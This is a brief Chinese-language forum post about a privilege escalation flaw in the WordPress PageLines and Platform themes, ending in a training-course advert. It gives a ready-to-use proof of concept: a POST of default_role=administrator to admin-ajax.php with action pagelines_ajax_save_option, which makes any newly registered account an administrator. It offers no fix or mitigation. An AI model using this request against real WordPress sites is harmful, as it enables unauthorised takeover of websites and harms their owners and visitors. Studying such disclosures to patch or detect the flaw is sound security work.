WordPress网站如果使用了Platform主题（版本号小于1.4.4），黑客就可以轻易取得该网站的权限。

黑客可以利用恶意软件、SEO垃圾邮件以及其他方式，执行PHP代码来感染你的网站。在使用了主题Pagelines（版本号小于1.4.6）的WordPress网站中，黑客只要注册一个账号，就可以使用权限提升exp进行攻击。提升权限后黑客可以做许多事，包括使用WordPress主题文件编辑器。
wp_ajax_pagelines_ajax_save_option和pagelines_ajax_save_option_callback是在一起的。so，我们只要找到wp_ajax_pagelines_ajax_save_option就好了。

文件：/wp-admin/admin-ajax.php

所以只要是wp_ajax钩子都可以调用，哪怕是订阅者权限。

一共一句话还要exp么？

POC（概念验证程序）

http://localhost//wp-admin/admin-ajax.php?action=pagelines_ajax_save_option
post:default_role=administrator
先注册一个号，然后提交。什么也不显示也对了。然后再注册一个号，就是管理员了。

http://localhost//wp-admin/admin-ajax.php?action=pagelines_ajax_save_option
post:default_role=administrator

关于第二代码执行，好像必须得管理员权限。

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课